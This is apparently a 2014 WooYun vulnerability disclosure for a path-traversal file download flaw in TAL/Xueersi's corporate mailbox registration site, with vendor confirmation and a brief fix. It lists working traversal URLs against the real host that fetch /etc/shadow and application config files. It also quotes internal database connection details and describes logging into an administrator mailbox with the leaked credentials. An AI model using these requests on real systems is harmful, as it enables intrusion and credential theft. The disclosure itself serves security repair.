漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-072330
漏洞标题:学而思(好未来)企业邮箱相关系统敏感信息可被获取
相关厂商:好未来集团学而思培优
漏洞作者: Coffee
提交时间:2014-08-14 10:32
修复时间:2014-09-28 10:34
公开时间:2014-09-28 10:34
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-14: 细节已通知厂商并且等待厂商处理中
2014-08-14: 厂商已经确认,细节仅向厂商公开
2014-08-24: 细节向核心白帽子及相关领域专家公开
2014-09-03: 细节向普通白帽子公开
2014-09-13: 细节向实习白帽子公开
2014-09-28: 细节向公众公开
简要描述:
任意文件下载漏洞,可获取网站源代码、数据库连接配置文件、系统配置文件、shadow等,进而获取某管理员邮箱。
详细说明:
#1、存在问题的页面
好未来企业邮箱注册系统
插件下载:http://youxiang.100tal.com/regmail/download.action?file=plugin/MacAddressViewer/MacAddressViewer.msi
file参数未过滤,导致任意文件下载。
#2、任意文件下载
仅以部分文件为例:
源代码:http://youxiang.100tal.com/regmail/download.action?file=index.jsp
shadow:http://youxiang.100tal.com/regmail/download.action?file=/plugin/../../../../../../etc/shadow
得到服务器的部分用户,密文就不贴上来了:l***e zh***an m***yuan l***a h***iao l***ei
web.xml:http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/web.xml
#3、继续挖掘
读取web.xml,又进而得到以下文件:
http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/classes/config/core/applicationContext.xml
http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/classes/datasource.properties
http://youxiang.100tal.com/regmail/download.action?file=/plugin/..//WEB-INF/classes/prop.properties
其中,datasource.properties保存了数据库连接配置:
jdbc.url = jdbc:mysql://192.168.1.111:3409/regmail?zeroDateTimeBehavior=convertToNull&characterEncoding=UTF-8
jdbc.user = RegMail
jdbc.password = 略
prop.properties保存了部分系统配置,包括员工中心soap接口、管理员邮箱(发信邮箱?未验证)等:
#员工中心接口地址根路径
user.center.rootpath=http://oas.xueersi.org/
#员工中心soap接口fsite值
usercenter.soap.fsite=5
#员工中心soap接口uskey值
usercenter.soap.uskey=略
得到的邮箱和密码可登录:(未翻看邮件,仅截图组织通讯录证明危害)
漏洞证明:
http://youxiang.100tal.com/regmail/download.action?file=/plugin/../../../../../../etc/shadow
http://youxiang.100tal.com/regmail/download.action?file=/plugin/../WEB-INF/classes/datasource.properties
http://youxiang.100tal.com/regmail/download.action?file=/plugin/..//WEB-INF/classes/prop.properties
修复方案:
#1、下载文件处过滤非法路径
#2、写的很简略,但猜路径猜文件名走各种弯路累死了……求高rank
版权声明:转载请注明来源 Coffee@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-08-14 14:45
厂商回复:
非常严重的漏洞,非常感谢白帽对学而思培优的支持,正在积极修复
最新状态:
暂无